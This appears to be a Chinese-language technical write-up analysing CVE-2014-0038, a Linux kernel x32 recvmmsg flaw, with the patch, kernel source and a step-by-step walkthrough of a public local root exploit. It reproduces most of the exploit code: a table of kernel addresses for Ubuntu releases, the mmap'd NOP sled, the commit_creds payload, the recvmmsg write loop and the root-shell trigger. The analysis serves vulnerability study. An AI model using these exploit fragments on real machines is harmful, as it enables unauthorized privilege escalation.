关键字:CVE-2014-0038,内核漏洞,POC,利用代码,本地提权,提权,exploit,cve analysis, privilege escalation, cve, kernel vulnerability
简介
2014年1月31号时,solar在oss-sec邮件列表里公布了该CVE(cve-2014-0038)。这个CVE涉及到X32 ABI。X32 ABI在内核linux3.4中被合并进来,但RHEL/fedora等发行版并没有开启该编译选项,因此未受该CVE影响。Ubuntu系统在近期的版本中开启了该选项,因此收该CVE影响。X32 ABI就是在64位环境中使用32位地址,效率有所提升,相关信息请参照参考资料或google。
漏洞原理
先看该CVE对应的patch``` diff –git a/net/compat.c b/net/compat.c index dd32e34..f50161f 100644 — a/net/compat.c +++ b/net/compat.c @@ -780,21 +780,16 @@ asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg, if (flags & MSG_CMSG_COMPAT) return -EINVAL;
if (COMPAT_USE_64BIT_TIME)
return \_\_sys\_recvmmsg(fd, (struct mmsghdr \_\_user \*)mmsg, vlen,
flags | MSG\_CMSG\_COMPAT,
(struct timespec \*) timeout);
if (timeout == NULL) return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen, flags | MSG_CMSG_COMPAT, NULL);
if (get_compat_timespec(&ktspec, timeout))
if (compat_get_timespec(&ktspec, timeout)) return -EFAULT;
datagrams = __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen, flags | MSG_CMSG_COMPAT, &ktspec);
- if (datagrams > 0 && put_compat_timespec(&ktspec, timeout))
if (datagrams > 0 && compat_put_timespec(&ktspec, timeout)) datagrams = -EFAULT;
return datagrams;
该CVE引入的原因就是没有对用户空间的输入信息进行拷贝处理,直接将用户空间输入的timeout指针传递给\_\_sys\_recvmmsg函数进行处理。正如patch中的修改方式,当timeout参数非空时,调用compat\_get\_timespec先对timetou进行处理,而该函数会对用户空间的timeout进行copy处理。
int compat_get_timespec(struct timespec *ts, const void __user *uts) { if (COMPAT_USE_64BIT_TIME) return copy_from_user(ts, uts, sizeof *ts) ? -EFAULT : 0; else return get_compat_timespec(ts, uts); }那么我们再来看传递进来的timeout会进行什么操作呢?在 \_\_sys\_recvmmsg里面。
/* * Linux recvmmsg interface */
int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen, unsigned int flags, struct timespec *timeout) { int fput_needed, err, datagrams; struct socket *sock; struct mmsghdr __user *entry; struct compat_mmsghdr __user *compat_entry; struct msghdr msg_sys; struct timespec end_time;
if (timeout &&
poll\_select\_set\_timeout(&end\_time, timeout->tv\_sec,
timeout->tv\_nsec))
return -EINVAL;
datagrams = 0;
sock = sockfd\_lookup\_light(fd, &err, &fput\_needed);
if (!sock)
return err;
err = sock\_error(sock->sk);
if (err)
goto out\_put;
entry = mmsg;
compat\_entry = (struct compat\_mmsghdr \_\_user \*)mmsg;
while (datagrams < vlen) {
/\*
\* No need to ask LSM for more than the first datagram.
\*/
if (MSG\_CMSG\_COMPAT & flags) {
err = \_\_\_sys\_recvmsg(sock, (struct msghdr \_\_user \*)compat\_entry,
&msg\_sys, flags & ~MSG\_WAITFORONE,
datagrams);
if (err < 0)
break;
err = \_\_put\_user(err, &compat\_entry->msg\_len);
++compat\_entry;
} else {
err = \_\_\_sys\_recvmsg(sock,
(struct msghdr \_\_user \*)entry,
&msg\_sys, flags & ~MSG\_WAITFORONE,
datagrams);
if (err < 0)
break;
err = put\_user(err, &entry->msg\_len);
++entry;
}
if (err)
break;
++datagrams;
/\* MSG\_WAITFORONE turns on MSG\_DONTWAIT after one packet \*/
if (flags & MSG\_WAITFORONE)
flags |= MSG\_DONTWAIT;
if (timeout) {
ktime\_get\_ts(timeout);
\*timeout = timespec\_sub(end\_time, \*timeout);
if (timeout->tv\_sec < 0) {
timeout->tv\_sec = timeout->tv\_nsec = 0;
break;
}
/\* Timeout, return less than vlen datagrams \*/
if (timeout->tv\_nsec == 0 && timeout->tv\_sec == 0)
break;
}
/\* Out of band data, return right away \*/
if (msg\_sys.msg\_flags & MSG\_OOB)
break;
}
out_put: fput_light(sock->file, fput_needed);
if (err == 0)
return datagrams;
if (datagrams != 0) {
/\*
\* We may return less entries than requested (vlen) if the
\* sock is non block and there aren't enough datagrams...
\*/
if (err != -EAGAIN) {
/\*
\* ... or if recvmsg returns an error after we
\* received some datagrams, where we record the
\* error to return on the next call or if the
\* app asks about it using getsockopt(SO\_ERROR).
\*/
sock->sk->sk\_err = -err;
}
return datagrams;
}
return err;
}
该函数中对poll\_select\_set\_timeout(&end\_time, timeout->tv\_sec, timeout->tv\_nsec))。设定结束时间。然后如下的代码保证timeout>=0
if (timeout) {
ktime_get_ts(timeout);
*timeout = timespec_sub(end_time, *timeout);
if (timeout->tv_sec < 0) {
timeout->tv_sec = timeout->tv_nsec = 0;
break;
}
/\* Timeout, return less than vlen datagrams \*/
if (timeout->tv\_nsec == 0 && timeout->tv\_sec == 0)
break;
}
此外,poll\_select\_set\_timeout会对timespec进行检查,因此传递进来的timeout的tv\_sec与tv\_nsec必须符合timeout结构体,也就是构造利用地址的时候,地址上下文必须符合特定内容。
/*
* Returns true if the timespec is norm, false if denorm:
*/
static inline bool timespec_valid(const struct timespec *ts)
{
/* Dates before 1970 are bogus */
if (ts->tv_sec < 0)
return false;
/* Can’t have more nanoseconds then a second */
if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC)
return false;
return true;
}
### 利用代码分析
当前在exploit-db上有2个利用代码,利用原理基本相同,只是选用的构造地址的结构体不同,本文选用http://www.exploit-db.com/exploits/31347/中的exploit代码进行分析。 本exploit代码和其他很多内核提权代码利用方式大致相同,通过使用有漏洞的系统调用将一个特定的内核函数地址修改成用户空间地址,然后将提权代码映射到对应地址的用户空间中,这样当用户调用被修改的特定函数时,内核便执行了相关的提权代码。以下对应该利用代码进行详细说明。 大家都知道,在64位系统中,由于地址较多,内核空间和用户空间只需通过高几位是否为0或1进行区分,内核空间地址的范围是0xffff ffff ffff ffff~0xffff 8000 0000 0000,而用户空间的地址范围是0x0000 7ffff ffff ffff~0x0000 0000 0000 0000。因此只需使用timeout的流程将高位的1变成0即可。 该exploit代码使用net\_sysctl\_root结构体的net\_ctl\_permissions函数指针进行利用。由于各个内核版本中不同函数对应的地址不同,因此定义了一个结构体存放各个内核内核版本的函数地址,这样就可以在多个写了特定内核地址的内核上完成提权操作。```
struct offset {
char \*kernel\_version;
unsigned long dest; // net\_sysctl\_root + 96
unsigned long original\_value; // net\_ctl\_permissions
unsigned long prepare\_kernel\_cred;
unsigned long commit\_creds;
};
struct offset offsets\[\] = {
{"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
{"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
{"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
{NULL,0,0,0,0}
};
```Exploit程序开始就使用该函数映射结构体对当前内核进行检查,获取出要使用的函数地址指针offsets\[i\]。 然后使用net\_ctl\_permissons的地址进行页对齐,之后将高6\*4位变成0,即设定为用户空间地址。```
mmapped = (off->original\_value & ~(sysconf(\_SC\_PAGE\_SIZE) - 1));
mmapped &= 0x000000ffffffffff;
```之后以该地址为基址map一段内存空间,设定该map区域可写、可执行。先用0x90填充该map区域,构造滑梯。然后将提权代码拷贝到该map区域。```
mmapped = (long)mmap((void \*)mmapped, sysconf(\_SC\_PAGE\_SIZE)\*3, PROT\_READ|PROT\_WRITE|PROT\_EXEC, MAP\_PRIVATE|MAP\_ANONYMOUS|MAP\_FIXED, 0, 0);
if(mmapped == -1) {
perror("mmap()");
exit(-1);
}
memset((char \*)mmapped,0x90,sysconf(\_SC\_PAGE\_SIZE)\*3);
memcpy((char \*)mmapped + sysconf(\_SC\_PAGE\_SIZE), (char \*)&trampoline, 300);
if(mprotect((void \*)mmapped, sysconf(\_SC\_PAGE\_SIZE)\*3, PROT\_READ|PROT\_EXEC) != 0) {
perror("mprotect()");
exit(-1);
```提权代码是非常传统的内核提权代码,通过调用commit\_creds修改进程creds数据结构。注意commit\_creds和prepare\_kernel\_cred也是由特定于内核版本的内核地址信息获得,因此也包含在offset结构体中,需要依据特定的内核版本进行设定。```
static int \_\_attribute\_\_((regparm(3)))
getroot(void \*head, void \* table)
{
commit\_creds(prepare\_kernel\_cred(0));
return -1;
}
void \_\_attribute\_\_((regparm(3)))
trampoline()
{
asm("mov $getroot, %rax; call \*%rax;");
}
```准备环境已经就绪,接下来就需要调用有漏洞的\_\_NR\_recvmmsg来进行地址修改。即修改net\_sysctl\_root中permissions指针的数值。```
static struct ctl\_table\_root net\_sysctl\_root = {
.lookup = net\_ctl\_header\_lookup,
.permissions = net\_ctl\_permissions,
};
```而ctl\_table\_root的定义为:```
struct ctl\_table\_root {
struct ctl\_table\_set default\_set;
struct ctl\_table\_set \*(\*lookup)(struct ctl\_table\_root \*root,
struct nsproxy \*namespaces);
int (\*permissions)(struct ctl\_table\_header \*head, struct ctl\_table \*table);
};
```通过计算ctl\_table\_root可知:Permissions的位置为net\_sysctl\_root+96。这样依次使用系统调用的timeout将.permissions的值的高6\*4位从之前的1修改为0即可。```
for(i=0;i < 3 ;i++) {
udp(i);
retval = syscall(\_\_NR\_recvmmsg, sockfd, msgs, VLEN, 0, (void \*)off->dest+7-i);
if(!retval) {
fprintf(stderr,"\\nrecvmmsg() failed\\n");
}
}
```通过使用三次该系统调用,依次将0xFF\*\* \*\*\*\* \*\*\*\* \*\*\*\*,0x00FF \*\*\*\* \*\*\*\* \*\*\*\*, 0x0000 FF\*\* \*\*\*\* \*\*\*\*的FF修改为00. 执行完毕后,提权程序成功将permissions指向了填充了提权代码的用户空间中。注意:这里必须从高位开始处理,由于各个程序是并行处理的,因此无法准确的保证timeout值和sleep值完全匹配,又由于timeout值的tv\_sec>=0,因此只要从高位依次处理就可以避免借位的情况发生。这里也是结构体选取的条件之一。 由于0xff\*3 = 765,因此该提权程序需要13分钟才能将permissions指向的地址值变成用户空间的地址值。 万事具备,只欠东风。只要用户调用修改后的net\_sysctl\_root->permissions即可。```
void trigger() {
open("/proc/sys/net/core/somaxconn",O\_RDONLY);
if(getuid() != 0) {
fprintf(stderr,"not root, ya blew it!\\n");
exit(-1);
}
fprintf(stderr,"w00p w00p!\\n");
system("/bin/sh -i");
}
```到此,该CVE分析完毕。不得不说该CVE的原理虽然比较简单,但实现最后利用修过的手法还是非常巧妙的,值得学习\\借鉴。
### 参考
1、[http://en.wikipedia.org/wiki/X32\_ABI](http://en.wikipedia.org/wiki/X32_ABI)